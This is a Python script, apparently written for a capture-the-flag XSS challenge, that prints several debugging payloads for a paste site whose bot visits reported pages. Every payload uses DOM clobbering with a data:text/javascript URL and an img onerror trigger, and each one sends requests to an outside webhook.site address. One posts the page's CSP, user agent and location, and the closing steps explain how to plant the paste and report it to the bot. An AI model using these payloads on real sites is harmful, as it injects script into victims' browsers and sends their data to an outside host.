#!/usr/bin/env python3
"""
DEBUGGING: Why didn't we get a webhook response?

Possible issues:
1. XSS didn't trigger at all
2. CSP blocked the request
3. Bot didn't visit the page
4. Network issue
"""

import urllib.parse
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

print("=" * 80)
print("🔍 DEBUGGING PAYLOADS - Let's figure out what's wrong")
print("=" * 80)

# SIMPLEST POSSIBLE PAYLOAD - Just send a ping
print("\n1️⃣  ULTRA-SIMPLE TEST: Basic fetch()")
print("=" * 80)
print("\nThis is the absolute simplest XSS possible:")
simple = f'<form id="errorReporter"><input name="path" value="data:text/javascript,fetch(\'{WEBHOOK}?ping=1\')"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(simple)
print("\n✅ If this works → XSS is executing")
print("❌ If this fails → XSS isn't triggering at all\n")

# Test with alert (won't see it, but different execution path)
print("\n2️⃣  TEST: Multiple webhook calls")
print("=" * 80)
code = f"""
fetch('{WEBHOOK}?step=1');
setTimeout(() => fetch('{WEBHOOK}?step=2'), 1000);
setTimeout(() => fetch('{WEBHOOK}?step=3'), 2000);
""".replace('\n', '')
encoded = urllib.parse.quote(code)
multi = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(multi)
print("\n→ Sends 3 requests over 2 seconds")
print("→ Shows if timing is an issue\n")

# Check if error handler is even triggered
print("\n3️⃣  TEST: Is error handler triggered?")
print("=" * 80)
code3 = f"""
fetch('{WEBHOOK}?handler_executed=yes&error=' + encodeURIComponent(window.lastRenderError || 'no_error'));
""".replace('\n', '')
encoded3 = urllib.parse.quote(code3)
handler_test = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded3}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(handler_test)
print("\n→ Confirms if handleError() is called\n")

# Check CSP
print("\n4️⃣  TEST: Check CSP headers")
print("=" * 80)
code4 = f"""
fetch('{WEBHOOK}', {{
    method: 'POST',
    body: JSON.stringify({{
        csp: document.querySelector('meta[http-equiv="Content-Security-Policy"]')?.content || 'no-meta-csp',
        userAgent: navigator.userAgent,
        location: location.href
    }})
}});
""".replace('\n', ' ')
encoded4 = urllib.parse.quote(code4)
csp_test = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded4}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(csp_test)
print("\n→ Shows CSP and user agent\n")

# Try without async/await
print("\n5️⃣  TEST: Without async (simpler)")
print("=" * 80)
code5 = f"""
var img = new Image();
img.src = '{WEBHOOK}?method=image_ping';
fetch('{WEBHOOK}?method=fetch_ping');
""".replace('\n', '')
encoded5 = urllib.parse.quote(code5)
no_async = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded5}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(no_async)
print("\n→ Uses both Image and fetch")
print("→ One of them might work\n")

print("=" * 80)
print("🎯 RECOMMENDED TESTING ORDER:")
print("=" * 80)
print("\n1. Start with PAYLOAD 1 (ULTRA-SIMPLE)")
print("   → This confirms if XSS works AT ALL")
print()
print("2. If no webhook response:")
print("   → XSS might not be triggering")
print("   → Double-check you're creating the paste correctly")
print("   → Make sure you're reporting the correct URL to bot")
print()
print("3. If webhook DOES respond:")
print("   → Try PAYLOAD 5 (image + fetch methods)")
print("   → Then try the comprehensive PAYLOAD 7 from ALTERNATIVE_PAYLOADS")
print()
print("=" * 80)
print("\n💡 IMPORTANT: Did you...")
print("   ✓ Create a NEW paste with the payload?")
print("   ✓ Report the FULL paste URL (not /report)?")
print("   ✓ Wait 30 seconds for bot to visit?")
print("   ✓ Check webhook tab is still open?")
print("=" * 80)